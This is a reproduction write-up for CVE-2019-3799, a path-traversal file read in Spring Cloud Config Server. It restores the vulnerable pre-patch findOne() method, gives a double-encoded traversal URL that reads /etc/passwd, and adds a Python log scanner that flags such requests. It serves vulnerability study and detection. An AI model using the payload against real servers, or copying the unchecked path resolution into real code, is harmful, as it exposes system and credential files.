Spring Cloud Config Server arbitrary file read vulnerability (CVE-2019-3799)

About this vulnerability

Affected versions:
Spring Cloud Config 2.1.0 to 2.1.1
Spring Cloud Config 2.0.0 to 2.0.3
Spring Cloud Config 1.4.0 to 1.4.5
Other unsupported older versions (e.g. Spring Cloud Config 1.3 and below)

For the details of the fix, see the patch commit: https://github.com/spring-cloud/spring-cloud-config/commit/9617f2922ee2ae27f08676716224933f0d869719

Clone the git repository: https://github.com/spring-cloud/spring-cloud-config

Edit GenericResourceRepository.java

Replace the findOne method with the pre-patch code:

    // Pre-patch findOne (the "before" side of commit 9617f29). The request-supplied
    // path is resolved relative to each search location with createRelative() and
    // returned as soon as it exists and is readable; nothing checks that the
    // resolved resource still lies inside the location, which is what the
    // traversal PoC below relies on.
    @Override
    public synchronized Resource findOne(String application, String profile, String label,
            String path) {

        if (StringUtils.hasText(path)) {
            // Search locations configured for this application/profile/label
            String[] locations = this.service.getLocations(application, profile, label)
                    .getLocations();
            try {
                // Walk the locations from last to first
                for (int i = locations.length; i-- > 0;) {
                    String location = locations[i];
                    // Candidate file names for the requested path and profile
                    for (String local : getProfilePaths(profile, path)) {
                        Resource file = this.resourceLoader.getResource(location)
                                .createRelative(local);
                        if (file.exists() && file.isReadable()) {
                            return file;
                        }
                    }
                }
            }
            catch (IOException e) {
                throw new NoSuchResourceException(
                        "Error : " + path + ". (" + e.getMessage() + ")");
            }
        }
        throw new NoSuchResourceException("Not found: " + path);
    }

Run mvn spring-boot:run in the project root.

Analysis

https://mp.weixin.qq.com/s/yj0cWEsyiPJr4A7YXpmLJw

Reproduction

poc:

/test/pathtraversal/master/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd
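The following Python script is an added example and is not code from the original post or from the Spring Cloud Config project. It shows why the PoC above uses double encoding (a single percent-decode of `..%252f` only yields `..%2f`, so the slash never appears until a second decode), resolves the `**` part of a resource request against an assumed repository root, and flags requests whose normalized path escapes that root. The repository root `/var/config-repo`, the route pattern and the access-log lines are all constructed for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed repository root for the example; not a value from the original post.
REPO_ROOT = "/var/config-repo"

# Route shape of the resource endpoint: /{application}/{profile}/{label}/** .
# The trailing group is the resource path that findOne() resolves.
CONFIG_ROUTE = re.compile(
    r"^/(?P<app>[^/]+)/(?P<profile>[^/]+)/(?P<label>[^/]+)/(?P<resource>.*)$"
)

# Extracts the request line from a combined-format access-log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Apr/2019:10:16:19 +0000] "GET /test/pathtraversal/master/application.yml HTTP/1.1" 200 512
10.0.0.7 - - [18/Apr/2019:10:16:22 +0000] "GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1" 200 1430
10.0.0.9 - - [18/Apr/2019:10:16:30 +0000] "GET /health HTTP/1.1" 200 15
"""


def fully_decode(raw, max_rounds=5):
    """Percent-decode until the value stops changing (bounded).

    A servlet container decodes once, so "..%252f" reaches the application
    as "..%2f"; a detector that decodes only once misses the traversal.
    """
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def resolve_resource(resource_path, root=REPO_ROOT):
    """Resolve the resource path under root and report whether it stays inside.

    Returns (normalized_path, inside). An absolute decoded path replaces the
    root in posixpath.join, which is also reported as outside.
    """
    decoded = fully_decode(resource_path)
    resolved = posixpath.normpath(posixpath.join(root, decoded))
    inside = resolved == root or resolved.startswith(root + "/")
    return resolved, inside


def scan_log(text):
    """Return (client_ip, request_path, resolved_path) for requests that escape the root."""
    flagged = []
    for line in text.splitlines():
        request = LOG_RE.search(line)
        if not request:
            continue
        route = CONFIG_ROUTE.match(request.group("path"))
        if not route:
            continue  # not a config resource request
        resolved, inside = resolve_resource(route.group("resource"))
        if not inside:
            flagged.append((line.split()[0], request.group("path"), resolved))
    return flagged


if __name__ == "__main__":
    for ip, path, resolved in scan_log(SAMPLE_LOG):
        print(f"{ip} requested {path} -> resolves to {resolved} (outside {REPO_ROOT})")
```

The containment check in resolve_resource is the property the patched code needs to enforce: after decoding and normalization, the file served must still be under the configured search location. The same decode-then-normalize logic can be run over real access logs to find attempts against servers that were exposed before the fix was applied.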

